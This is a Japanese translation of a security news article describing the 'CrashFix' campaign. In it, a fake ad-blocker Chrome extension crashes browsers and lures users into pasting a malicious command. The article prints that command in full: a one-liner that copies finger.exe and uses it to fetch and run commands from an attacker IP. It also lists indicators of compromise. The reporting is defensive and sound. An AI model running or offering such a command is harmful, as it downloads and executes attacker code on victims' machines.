研究者は、「CrashFix」と名付けられた新たなブラウザベースのソーシャルエンジニアリングキャンペーンを発見した。これは偽の広告ブロッカー拡張機能を悪用し、被害者のブラウザをクラッシュさせて、悪意のあるPowerShellコマンドを実行させるよう騙すものだ。
2026年1月、シニア・セキュリティ・オペレーションズ・アナリストのTanner Filipは、ブラウザが繰り返しフリーズした後、「CrashFix」のポップアップが表示され、ブラウザが「異常停止」したためスキャンが必要だと主張する被害者を確認した。
根本原因は、公式のChromeウェブストアからインストールされた「NexShield Advanced Web Protection」というChrome拡張機能だった。
NexShieldは、Raymond Hillによる正規のuBlock Origin Liteプロジェクトのほぼ1対1のクローンであり、彼に誤ってクレジットを与え、存在しないGitHubリポジトリを指す偽造ヘッダーまで含まれている。
拡張機能IDはcpcdkmjddocikjdkbbeiaafnpdbdafmiで、開発者メールアドレスは[email protected]である。
裏では、NexShieldはタイポスクワッティングされたドメイン nexsnield[.]com を使用して攻撃者のインフラへ通信(ホームコール)する。
インストール、更新、アンインストールの際に、一意のUUIDとバージョン情報を含むビーコンを送信し、オペレーターが各被害者と拡張機能のライフサイクルイベントをすべて追跡できるようにしている。
Chrome Alarmsのタイマーにより、悪意ある挙動は約60分遅延される。その後は10分ごとに実行され、ユーザーがブラウザの不具合を直近のインストールと結び付けにくくしている。
CrashFixの挙動の中核は、拡張機能内のサービス妨害ルーチンである。大量のChromeウィンドウを高速に開く。runtimeポートをタイトなループで回し、CPUとメモリを枯渇させて、ブラウザが応答しなくなるかクラッシュするまで追い込む。これが起きる前に、タイムスタンプがローカルに保存される。
苛立ったユーザーが強制終了してブラウザを再起動すると、拡張機能はそのタイムスタンプを記録する。そして攻撃者の/whats-newページへ誘導する400×600のポップアップウィンドウ を開く。
このウィンドウは偽の「CrashFix」セキュリティ警告を表示し、ブラウザが予期せずクラッシュしたと主張して、ユーザーに「スキャンを実行」するよう促す。
ユーザーが指示に従うと、Windowsの「ファイル名を指定して実行」ダイアログ(Win+R)を開き、Ctrl+Vを押すよう指示される。
ユーザーが気付かないうちに、拡張機能はすでに悪意のあるPowerShellコマンドをクリップボードにコピーしている。貼り付けてEnterを押すと、次が黙って実行される:
cmd /c start “” /min cmd /c “copy %windir%\system32\finger.exe %temp%\ct.exe&%temp%\ct.exe [email protected][.]108|cmd.”
これは組み込みのfinger.exeツールを%temp%にct.exeとしてコピーし、その後それを使って199.217.98[.]108から追加コマンドを取得して実行する。
後続段階では難読化されたPowerShellを用いてさらにペイロードをダウンロードして実行し、一時ファイルを削除して痕跡を減らす。
このキャンペーンの背後にいる脅威アクターKongTukeは、明らかに企業標的を好んでいる。感染ホストがドメイン参加している場合、PowerShellチェーンはDropboxリンクからWinPythonバンドルをダウンロードし、modes.pyというPythonスクリプトを起動する。
非ドメイン(家庭用)システムは、より重い多層のPowerShellおよびDGAチェーンに通され、解析時点では最終的にTEST PAYLOAD!!!!しか返さなかったことから、この分岐はまだ開発中であるか、将来の利用のために確保されていることが示唆される。
組織は環境内のブラウザ拡張機能を見直し、記載されたドメインとIPをブロックし、finger.exeの不審な使用を監視し、上記の永続化およびC2の痕跡をエンドポイント全体でハンティングすべきである。
翻訳元: https://cyberpress.org/crashfix-malicious-browser-extensions-fake-security-warnings/